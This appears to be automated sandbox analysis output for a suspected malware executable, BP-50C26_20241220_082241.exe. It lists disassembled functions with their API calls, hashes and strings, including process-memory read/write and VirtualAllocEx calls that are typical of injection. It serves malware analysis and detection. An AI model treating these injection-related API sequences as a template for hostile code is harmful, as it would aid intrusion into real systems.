                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: c5c51e00411270c52d295d2499a871057943dbe585881e6fe411e4c1b0c740ca
                                                                                      • Instruction ID: 0413710c090de4d678ba7d218d2809fc4356613b905069b55a6431b558c9d188
                                                                                      • Opcode Fuzzy Hash: c5c51e00411270c52d295d2499a871057943dbe585881e6fe411e4c1b0c740ca
                                                                                      • Instruction Fuzzy Hash: F6F04935200301AFDB214FA89C89F9A3BADEF8A766F144414FA49C7251DE70DC508A60
                                                                                      Function 00C71014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C7102A
                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C71036
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71045
                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7104C
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71062
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: cf7a583c2cbfc6dad122758e9660c36bdc6152b19820f59e80ea34dccf2a7663
                                                                                      • Instruction ID: f3cc19f1bd147346447bacb805fd39bfc7da7f92b008879763cb19203e3440df
                                                                                      • Opcode Fuzzy Hash: cf7a583c2cbfc6dad122758e9660c36bdc6152b19820f59e80ea34dccf2a7663
                                                                                      • Instruction Fuzzy Hash: B7F06D35200301FBDB215FA8EC89F9A3BADEF8A765F144414FE49C7250DE70D9508A60
                                                                                      Function 00C8030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80324
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80331
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C8033E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C8034B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80358
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 15bc48ef4fc0762d5dbef3ef42710a45e58db3678c8162e4c127d493377dd3e4
                                                                                      • Instruction ID: 2a60ff37e9850cc93963563cb14e4113a762db26c58cf2a8275f37eb79bb5b52
                                                                                      • Opcode Fuzzy Hash: 15bc48ef4fc0762d5dbef3ef42710a45e58db3678c8162e4c127d493377dd3e4
                                                                                      • Instruction Fuzzy Hash: 30019072801B159FCB30AF66D880416F7F5BF602193258A3ED1A652931C771AA58DF84
                                                                                      Function 00C4D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C4D752
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4D764
                                                                                      • _free.LIBCMT ref: 00C4D776
                                                                                      • _free.LIBCMT ref: 00C4D788
                                                                                      • _free.LIBCMT ref: 00C4D79A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: defb73ef8943c9e2dfaf6213f52cf4238d4ed9aa37333cc01ba136eee1ebf9a0
                                                                                      • Instruction ID: 8059b41ae8f84a4d39d99ac8b9141c427788b722ee677d237092993823095de5
                                                                                      • Opcode Fuzzy Hash: defb73ef8943c9e2dfaf6213f52cf4238d4ed9aa37333cc01ba136eee1ebf9a0
                                                                                      • Instruction Fuzzy Hash: CDF09032541205AB8621FB69F9C2E1A7BDDBB04320BE40C06F05AE7546CB30FC80DA60
                                                                                      Function 00C75C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C75C58
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C75C6F
                                                                                      • MessageBeep.USER32(00000000), ref: 00C75C87
                                                                                      • KillTimer.USER32(?,0000040A), ref: 00C75CA3
                                                                                      • EndDialog.USER32(?,00000001), ref: 00C75CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3741023627-0
                                                                                      • Opcode ID: 00d179fba3f3835c3bc3a8e705b708139bbe7e48329188c35ddf770ca150daba
                                                                                      • Instruction ID: 79400189d0d61fe3c6fe03756fa5865c5029b728fa854ac18697ca79ea441419
                                                                                      • Opcode Fuzzy Hash: 00d179fba3f3835c3bc3a8e705b708139bbe7e48329188c35ddf770ca150daba
                                                                                      • Instruction Fuzzy Hash: F401A430500B04ABEB219B11DD8EFEA77B8BF05B09F044559B597A20E1DBF0AA84CB90
                                                                                      Function 00C422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C422BE
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C422D0
                                                                                      • _free.LIBCMT ref: 00C422E3
                                                                                      • _free.LIBCMT ref: 00C422F4
                                                                                      • _free.LIBCMT ref: 00C42305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 0a0586d1d3f7f103e70acfd57ec8bbbae2bc40712f664e8eb7d0c05fd380f512
                                                                                      • Instruction ID: 66c842e4adb97cf9d2489d04107457dd67596ea345800028d12b437593d7d792
                                                                                      • Opcode Fuzzy Hash: 0a0586d1d3f7f103e70acfd57ec8bbbae2bc40712f664e8eb7d0c05fd380f512
                                                                                      • Instruction Fuzzy Hash: ECF05E708011A19B9A22AF95BC83B0C3B68F728770794050BF810DE2B1C7715962FFE4
                                                                                      Function 00C295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 00C295D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,00C671F7,00000000,?,?,?), ref: 00C295F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00C29603
                                                                                      • DeleteObject.GDI32 ref: 00C29616
                                                                                      • StrokePath.GDI32(?), ref: 00C29631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: e6d2a022b37d685a43a42dafe7ba8c0cf91592e152d7d9d54f808c2efe3252e3
                                                                                      • Instruction ID: 66c4a864678db802bce69f763be00c7b36f9d01d7e6a2709e031545fcc17929b
                                                                                      • Opcode Fuzzy Hash: e6d2a022b37d685a43a42dafe7ba8c0cf91592e152d7d9d54f808c2efe3252e3
                                                                                      • Instruction Fuzzy Hash: 60F03C30005244EBDB125F65ED9C7AC3BA1EB02326F088224F9255A4F2CB348AA1DF20
                                                                                      Function 00C40F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$_free
                                                                                      • String ID: a/p$am/pm
                                                                                      • API String ID: 3432400110-3206640213
                                                                                      • Opcode ID: ffd513e567bdef884e48b25a0bd0795b0b8efa3f593113199d7ad124c9021967
                                                                                      • Instruction ID: 4215e8cc08471393e90bb90a8fec2391b4cc92512362a0e15fc1e021f168f297
                                                                                      • Opcode Fuzzy Hash: ffd513e567bdef884e48b25a0bd0795b0b8efa3f593113199d7ad124c9021967
                                                                                      • Instruction Fuzzy Hash: 83D10331A10246CADB289F69C855BFEBBB0FF05710F2C4119EDA1AB661D3759EC0CB91
                                                                                      Function 00C97B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C30242: EnterCriticalSection.KERNEL32(00CE070C,00CE1884,?,?,00C2198B,00CE2518,?,?,?,00C112F9,00000000), ref: 00C3024D
                                                                                        • Part of subcall function 00C30242: LeaveCriticalSection.KERNEL32(00CE070C,?,00C2198B,00CE2518,?,?,?,00C112F9,00000000), ref: 00C3028A
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C300A3: __onexit.LIBCMT ref: 00C300A9
                                                                                      • __Init_thread_footer.LIBCMT ref: 00C97BFB
                                                                                        • Part of subcall function 00C301F8: EnterCriticalSection.KERNEL32(00CE070C,?,?,00C28747,00CE2514), ref: 00C30202
                                                                                        • Part of subcall function 00C301F8: LeaveCriticalSection.KERNEL32(00CE070C,?,00C28747,00CE2514), ref: 00C30235
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                                      • API String ID: 535116098-3733170431
                                                                                      • Opcode ID: 2f669c1ffb87e24239e5a953aa95a09cecfe06abe10cfda80ee3bca22ac2e400
                                                                                      • Instruction ID: 47940d927af1ffd3b063b5325eebaee9b2d956505bdac81f2749d2712eb2beef
                                                                                      • Opcode Fuzzy Hash: 2f669c1ffb87e24239e5a953aa95a09cecfe06abe10cfda80ee3bca22ac2e400
                                                                                      • Instruction Fuzzy Hash: BA91BA71A15209EFCF04EF94C8999ADB7B1FF49304F108159F816AB292DB31AE81EB50
                                                                                      Function 00C72716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C7B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C721D0,?,?,00000034,00000800,?,00000034), ref: 00C7B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C72760
                                                                                        • Part of subcall function 00C7B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C7B3F8
                                                                                        • Part of subcall function 00C7B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C7B355
                                                                                        • Part of subcall function 00C7B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C72194,00000034,?,?,00001004,00000000,00000000), ref: 00C7B365
                                                                                        • Part of subcall function 00C7B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C72194,00000034,?,?,00001004,00000000,00000000), ref: 00C7B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C727CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: e4fec153c75e038a8380873b3ae54fe67aeaaffa9ee466d122e5e3eb61e1f8a6
                                                                                      • Instruction ID: b2d28a0531a3230f6ece25e137f0c2d5d4ed08069f3e59f59f9495ceeba29fe2
                                                                                      • Opcode Fuzzy Hash: e4fec153c75e038a8380873b3ae54fe67aeaaffa9ee466d122e5e3eb61e1f8a6
                                                                                      • Instruction Fuzzy Hash: 70411D72900218AFDB10DBA4CD85BDEBBB8AF05700F108095FA59B7191DB716F85DBA1
                                                                                      Function 00C4172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BP-50C26_20241220_082241.exe,00000104), ref: 00C41769
                                                                                      • _free.LIBCMT ref: 00C41834
                                                                                      • _free.LIBCMT ref: 00C4183E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe
                                                                                      • API String ID: 2506810119-4191354773
                                                                                      • Opcode ID: 60b0ae86e996e5c41a4bef042ade8e5841648a69fc9cdf8007a25c28d73a684b
                                                                                      • Instruction ID: 822b92ce9563a0c3a8b11bb7eace1235aa42da7108b81c156af849da92989621
                                                                                      • Opcode Fuzzy Hash: 60b0ae86e996e5c41a4bef042ade8e5841648a69fc9cdf8007a25c28d73a684b
                                                                                      • Instruction Fuzzy Hash: 1A318D71A00258ABDB21DF9ADC81E9EBBFCFB85310B194166FD549B251D6708A80DBA0
                                                                                      Function 00C7C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C7C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00C7C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CE1990,0125EBC0), ref: 00C7C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: d6786e713ae31df4c45ab18f47acefae11e0496939eadcde5b214afc9197d7d0
                                                                                      • Instruction ID: 283ec29dc1ff6d14d4f91d1f56df2398ed108f48e0decdf29a9ffedb7902109d
                                                                                      • Opcode Fuzzy Hash: d6786e713ae31df4c45ab18f47acefae11e0496939eadcde5b214afc9197d7d0
                                                                                      • Instruction Fuzzy Hash: E9419F712043029FD720DF25D8C4B9ABBE8AF85324F14CA1DF9A9972E1D730E904DB62
                                                                                      Function 00CA4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CACC08,00000000,?,?,?,?), ref: 00CA44AA
                                                                                      • GetWindowLongW.USER32 ref: 00CA44C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA44D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      • Opcode ID: 2cbc6f3cb31ee3d1ac85d592d30721fb79e40830d1655eeed6da7c5ea3b57530
                                                                                      • Instruction ID: 13f27307429f8300f17e72fd810abf7ca87c7068a955f46f006db778f1ea0a93
                                                                                      • Opcode Fuzzy Hash: 2cbc6f3cb31ee3d1ac85d592d30721fb79e40830d1655eeed6da7c5ea3b57530
                                                                                      • Instruction Fuzzy Hash: B8319E31210606AFDB248F78DC85BEA77A9EB4A338F204725F975931E0D7B0ED509B50
                                                                                      Function 00C9304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C9335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C93077,?,?), ref: 00C93378
                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C9307A
                                                                                      • _wcslen.LIBCMT ref: 00C9309B
                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00C93106
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 946324512-2422070025
                                                                                      • Opcode ID: 6700053ab4bd15b74e2493be6521c353358a1ffcf813e85e28bc72f9b46bd0ce
                                                                                      • Instruction ID: 7c72c338673c71e96cb1f925612ae64421c5fc31e1430f612b9f0be7181cb01f
                                                                                      • Opcode Fuzzy Hash: 6700053ab4bd15b74e2493be6521c353358a1ffcf813e85e28bc72f9b46bd0ce
